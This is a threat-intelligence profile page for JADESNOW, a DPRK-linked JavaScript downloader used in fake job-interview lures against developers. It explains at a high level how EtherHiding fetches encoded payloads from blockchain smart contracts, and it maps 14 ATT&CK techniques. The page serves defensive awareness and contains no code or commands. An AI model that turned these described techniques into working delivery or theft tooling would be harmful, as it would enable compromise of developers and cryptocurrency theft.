MalwareRansomwareUsed by 1 actor

JADESNOW

JADESNOW is a JavaScript-based downloader malware family associated with the DPRK-linked threat cluster UNC5342 and its Contagious Interview / fake recruiter operations. It is used in multi-stage social-engineering intrusions that target software and web developers, particularly in cryptocurrency and technology sectors, through fake job offers, technical assessments, GitHub-hosted projects, npm-hosted components, and related interview lures. Reporting also describes infections tied to compromised websites and recruiter-driven delivery workflows.

Its defining capability is use of the EtherHiding technique to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. Multiple sources in the content state that JADESNOW queries blockchain contracts or transaction data using read-only blockchain interactions, with payload data described as Base64-encoded and XOR-encrypted in some reporting. This blockchain-backed delivery is intended to make infrastructure more resilient to takedown and harder to disrupt with traditional domain/IP blocking.

JADESNOW functions as an early-stage or intermediate downloader/loader in a broader infection chain. It has been observed alongside BEAVERTAIL and is repeatedly described as delivering or deploying INVISIBLEFERRET, including a JavaScript variant of INVISIBLEFERRET. The resulting payloads support persistent access, remote control, credential theft, exfiltration, long-term espionage, and theft of cryptocurrency wallet data. Content also states that related stages in the chain target browser extension data, locally stored credentials, and cryptocurrency wallets such as MetaMask and Phantom.

High-confidence associations in the content link JADESNOW to North Korean operations for both financial gain and espionage, with victims including developers and crypto professionals. No standalone IOC set is provided in the content beyond the malware’s use of Ethereum and BNB Smart Chain smart contracts, blockchain explorer/API access patterns, and its recurring role in fake interview and recruiter-themed infection chains.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Contagious Interview

JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum.

via mandiant threat intelligencecloud.google.com

MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1189Drive-by CompromiseEvidence1

...attacker first gains access to a legitimate website... injects... JavaScript... When a user visits the compromised website, the loader script executes in their browser...

T1195Supply Chain CompromiseEvidence1

Titles include 'First instance of PylangGhost RAT observed on npm,' 'malware in hundreds of GitHub repos,' '338 malicious npm packages,' 'trojanized npm campaign,' 'malicious repositories,' 'dependency hijacking,' and 'Supply Chain Compromise.'

T1566PhishingEvidence1

The attacks typically begin fake job interviews, a hallmark for DPRK's hallmark social engineering tactics, from carefully fabricated entities (BlockNovas LLC, Angeloper Agency, SoftGlide LLC) targeting software and web developers.

Execution

3 techniques

T1059.007JavaScriptEvidence2

T1204User ExecutionEvidence2

Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.

T1204.002Malicious FileEvidence1

Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.

Stealth

3 techniques

T1027Obfuscated Files or InformationEvidence1

JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted.

T1140Deobfuscate/Decode Files or InformationEvidence1

T1564Hide ArtifactsEvidence1

Several titles reference 'Cross-Chain TxDataHiding Crypto Heist,' 'EtherHiding,' and 'Nation-State Malware Hiding on Blockchains.'

Credential Access

1 technique

T1555Credentials from Password StoresEvidence2

The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.

Discovery

1 technique

T1082System Information DiscoveryEvidence1

These loaders may collect initial system information and download the next stage of malware.

Command and Control

2 techniques

T1071Application Layer ProtocolEvidence1

The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload.

T1105Ingress Tool TransferEvidence2

These loaders may collect initial system information and download the next stage of malware.

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence1

The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.

ACTIVITY FEED

Recent activity

14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

14 SOURCESView more in app

malpediaNews

Mar 23, 2026

WageMole (Threat Actor)

A named malware/tool associated with DPRK-linked GitHub repository compromise and blockchain-focused theft campaigns.

picus security blogNews

Dec 4, 2025

EtherHiding: How Web3 Infrastructure Enables Stealthy Malware Distribution

JADESNOW is referenced as a malware downloader and dropper, likely used in campaigns leveraging EtherHiding techniques for payload delivery and initial infection vectors.

toms hardwareNews

Oct 18, 2025

Hackers slip malware inside blockchain to steal cryptocurrency — EtherHiding embeds malicious JavaScript payloads in smart contracts on public blockchains

JavaScript-based downloader/loader that retrieves a JavaScript payload from data embedded in BNB Smart Chain/Ethereum smart contracts (via read-only calls) and executes it locally to launch the next-stage backdoor (INVISIBLEFERRET).

ctoatncsc substackNews

Oct 18, 2025

CTO at NCSC Summary: week ending October 19th..

Malware used in a DPRK-linked social engineering campaign to deploy a JavaScript variant of INVISIBLEFERRET, associated with cryptocurrency theft activity.

+9 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping14

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.